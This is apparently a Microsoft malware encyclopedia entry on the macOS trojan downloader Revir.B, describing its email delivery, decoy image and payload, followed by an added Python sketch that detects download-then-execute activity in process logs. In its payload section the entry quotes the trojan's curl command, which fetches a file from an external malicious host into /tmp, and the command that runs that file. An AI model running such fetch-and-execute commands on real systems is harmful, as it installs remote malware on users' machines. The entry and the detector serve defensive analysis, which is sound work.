
TrojanDownloader:MacOS_X/Revir.B


First posted on 31 January 2013.
Source: Microsoft

Aliases:

There are no other names known for TrojanDownloader:MacOS_X/Revir.B.

Explanation:



TrojanDownloader:MacOS_X/Revir.B may arrive on your computer as an attachment or link within an email that is sent to you. The attachment or link may appear to be a legitimate PDF or JPG file.

When you open the attachment or click the link, the trojan will run.



Installation

TrojanDownloader:MacOS_X/Revir.B drops an image (JPG) file in the temporary folder ("~/tmp").

The trojan opens the JPG file in an attempt to hide its malicious behavior from you.



Payload

When opened, TrojanDownloader:MacOS_X/Revir.B runs from the following location:

~/tmp/host

The downloader connects to a server and downloads other malware, such as Backdoor:MacOS_X/Imuler.A, by using the following command:

curl -o /tmp/updtdata http://tarmu.narod.ru /<removed>

The trojan runs the downloaded file by using the following command:

/tmp/updtdata
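
An added detection sketch, not part of Microsoft's entry: it scans process-execution records for the sequence described above, a curl download written to /tmp that is later run from that same path. The record format, the sample events and the example.invalid URL are constructed for illustration, and the list of temporary directories is an assumption.

```python
import shlex

# Assumption: directories treated as temporary (/tmp is a symlink to /private/tmp on macOS).
TEMP_PREFIXES = ("/tmp/", "/private/tmp/")

# Constructed process-execution records: "<epoch> <pid> <command line>"
SAMPLE_EVENTS = """\
1359600000 410 /usr/bin/open /Users/alice/tmp/photo.jpg
1359600001 411 curl -o /tmp/updtdata http://example.invalid/payload
1359600002 412 curl -o /Users/alice/Documents/report.pdf http://example.invalid/report.pdf
1359600005 413 /tmp/updtdata
1359600009 414 /Users/alice/Documents/report.pdf
"""

def curl_output_path(argv):
    """Return the file curl was told to write (-o / --output), or None."""
    if not argv or argv[0].rsplit("/", 1)[-1] != "curl":
        return None
    for i, arg in enumerate(argv[1:], start=1):
        if arg in ("-o", "--output") and i + 1 < len(argv):
            return argv[i + 1]
        if arg.startswith("--output="):
            return arg.split("=", 1)[1]
        if arg.startswith("-o") and len(arg) > 2:  # attached form: -o/tmp/file
            return arg[2:]
    return None

def find_download_then_exec(log_text):
    """Flag files that curl wrote into a temp directory and that later ran as a program."""
    downloaded = {}  # output path -> the record of the curl invocation that wrote it
    findings = []
    for line in log_text.splitlines():
        fields = line.split(None, 2)
        if len(fields) < 3:
            continue  # skip blank or malformed records
        argv = shlex.split(fields[2])
        out = curl_output_path(argv)
        if out and out.startswith(TEMP_PREFIXES):
            downloaded[out] = line
        elif argv and argv[0] in downloaded:
            findings.append({"path": argv[0], "download": downloaded[argv[0]], "exec": line})
    return findings

if __name__ == "__main__":
    for f in find_download_then_exec(SAMPLE_EVENTS):
        print("download-then-execute:", f["path"], "|", f["download"], "|", f["exec"])
```
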

Related encyclopedia entries

Backdoor:MacOS_X/Imuler.A



Analysis by Methusela Cebrian Ferrer

Last update 31 January 2013

 
